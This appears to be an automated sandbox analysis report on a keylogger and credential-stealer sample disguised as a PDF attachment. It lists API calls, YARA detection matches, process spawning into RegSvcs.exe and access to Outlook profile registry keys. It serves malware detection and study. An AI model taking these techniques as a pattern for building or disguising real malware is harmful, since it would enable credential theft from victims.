                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007C4164
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007C3F66
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007B001C
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007DCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007DCABC

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00753B3A
                Source: PK241200518-EMAIL RELEASE-pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000000.2090017610.0000000000804000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c4dc2221-b
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000000.2090017610.0000000000804000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_df161507-2
                Source: PK241200518-EMAIL RELEASE-pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c2867a71-5
                Source: PK241200518-EMAIL RELEASE-pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c96e2510-c
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_007BA1EF
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007A8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007A8310
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007B51BD
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0075E6A00_2_0075E6A0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0077D9750_2_0077D975
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0075FCE00_2_0075FCE0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007721C50_2_007721C5
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007862D20_2_007862D2
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007D03DA0_2_007D03DA
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0078242E0_2_0078242E
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007725FA0_2_007725FA
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007AE6160_2_007AE616
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007666E10_2_007666E1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0078878F0_2_0078878F
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007D08570_2_007D0857
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007868440_2_00786844
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007688080_2_00768808
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B88890_2_007B8889
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0077CB210_2_0077CB21
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00786DB60_2_00786DB6
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00766F9E0_2_00766F9E
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007630300_2_00763030
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0077F1D90_2_0077F1D9
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007731870_2_00773187
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007512870_2_00751287
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007714840_2_00771484
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007655200_2_00765520
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007776960_2_00777696
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007657600_2_00765760
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007719780_2_00771978
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00789AB50_2_00789AB5
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007D7DDB0_2_007D7DDB
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0077BDA60_2_0077BDA6
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00771D900_2_00771D90
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0075DF000_2_0075DF00
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00763FE00_2_00763FE0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00E854600_2_00E85460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00BC20C82_2_00BC20C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00BC12402_2_00BC1240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00BC8E782_2_00BC8E78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010E81E02_2_010E81E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010E53702_2_010E5370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010ED2CB2_2_010ED2CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010ED5992_2_010ED599
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010E59682_2_010E5968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010EC8902_2_010EC890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010E7A682_2_010E7A68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010ECD282_2_010ECD28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010EAD482_2_010EAD48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010EEC182_2_010EEC18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010E5C382_2_010E5C38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010ECFF72_2_010ECFF7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010EF4BF2_2_010EF4BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010EF4D02_2_010EF4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010E29E02_2_010E29E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010ECA582_2_010ECA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010EEC0B2_2_010EEC0B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_010E3E092_2_010E3E09
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: String function: 00757DE1 appears 36 times
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: String function: 00770AE3 appears 70 times
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: String function: 00778900 appears 42 times
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2097547998.00000000037B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PK241200518-EMAIL RELEASE-pdf.exe
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PK241200518-EMAIL RELEASE-pdf.exe
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.00000000039AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PK241200518-EMAIL RELEASE-pdf.exe
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BA06A GetLastError,FormatMessageW,0_2_007BA06A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007A81CB AdjustTokenPrivileges,CloseHandle,0_2_007A81CB
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007A87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007A87E1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007BB333
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007CEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_007CEE0D
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_007C83BB
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00754E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00754E89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeFile created: C:\Users\user\AppData\Local\Temp\aut1EA1.tmpJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCommand line argument: Pm0_2_007547D0
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PK241200518-EMAIL RELEASE-pdf.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PK241200518-EMAIL RELEASE-pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00754B37 LoadLibraryA,GetProcAddress,0_2_00754B37
